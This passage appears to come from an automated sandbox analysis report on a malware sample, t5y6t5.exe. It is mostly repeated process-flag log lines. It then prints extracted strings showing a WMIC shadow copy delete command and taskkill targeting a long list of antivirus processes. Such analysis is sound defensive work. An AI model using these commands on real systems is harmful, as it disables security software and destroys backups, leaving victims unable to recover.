Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: t5y6t5.exe, 00000013.00000000.2335924756.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe, 0000001B.00000000.2475644812.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe, 0000001E.00000000.2558250004.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe.15.drBinary or memory string: COULD NOT CREATE CHILD PROCESSWOW64DISABLEWOW64FSREDIRECTIONKERNEL32.DLLWOW64REVERTWOW64FSREDIRECTIONABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\WMIC.EXE\..\\WBEM\\SYSTEM32\\WINDOWS\C:\SHADOWCOPY DELETEAVPMAPP.EXE,ECONCEAL.EXE,SECHEALTHUI.EXE,RUNTIMEBROKER.EXE,ESCANMON.EXE,ESCANPRO.EXE,TRAYSSER.EXE,TRAYICOS.EXE,ECONSER.EXE,VIEWTCP.EXE,FSHDLL64.EXE,FSGK32.EXE,FSHOSTER32.EXE,FSMA32.EXE,FSORSP.EXE,FSSM32.EXE,FSM32.EXE,TRIGGER.EXE,FPROTTRAY.EXE,FPWIN.EXE,FPAVSERVER.EXE,AVK.EXE,GDBGINX64.EXE,AVKPROXY.EXE,GDSCAN.EXE,AVKWCTLX64.EXE,AVKSERVICE.EXE,AVKTRAY.EXE,GDKBFLTEXE32.EXE,GDSC.EXE,VIRUSUTILITIES.EXE,GUARDXSERVICE.EXE,GUARDXKICKOFF_X64.EXE,IPTRAY.EXE,FRESHCLAM.EXE,FRESHCLAMWRAP.EXE,K7RTSCAN.EXE,K7FWSRVC.EXE,K7PSSRVC.EXE,K7EMLPXY.EXE,K7TSECURITY.EXE,K7AVSCAN.EXE,K7CRVSVC.EXE,K7SYSMON.EXE,K7TSMAIN.EXE,K7TSMNGR.EXE,MPCMDRUN.EXE,NANOSVC.EXE,NANOAV.EXE,NNF.EXE,NVCSVC.EXE,NBROWSER.EXE,NSEUPDATESVC.EXE,NFSERVICE.EXE,CMD.EXETASKKILL/IMNWSCMON.EXE,NJEEVES2.EXE,NVCOD.EXE,NVOY.EXE,ZLHH.EXE,ZLH.EXE,NPROSEC.EXE,ZANDA.EXE,NS.EXE,ACS.EXE,OP_MON.EXE,PSANHOST.EXE,PSUAMAIN.EXE,PSUASERVICE.EXE,AGENTSVC.EXE,BDSSVC.EXE,EMLPROXY.EXE,OPSSVC.EXE,ONLINENT.EXE,QUHLPSVC.EXE,SAPISSVC.EXE,SCANNER.EXE,SCANWSCS.EXE,SCPROXYSRV.EXE,SCSECSVC.EXE,SUPERANTISPYWARE.EXE,SASCORE64.EXE,SSUPDATE64.EXE,SUPERDELETE.EXE,SASTASK.EXE,K7RTSCAN.EXE,K7FWSRVC.EXE,K7PSSRVC.EXE,K7EMLPXY.EXE,K7TSECURITY.EXE,K7AVSCAN.EXE,K7CRVSVC.EXE,K7SYSMON.EXE,K7TSMAIN.EXE,K7TSMNGR.EXE,UIWINMGR.EXE,UIWATCHDOG.EXE,UISEAGNT.EXE,PTWATCHDOG.EXE,PTSVCHOST.EXE,PTSESSIONAGENT.EXE,COREFRAMEWORKHOST.EXE,CORESERVICESHELL.EXE,UIUPDA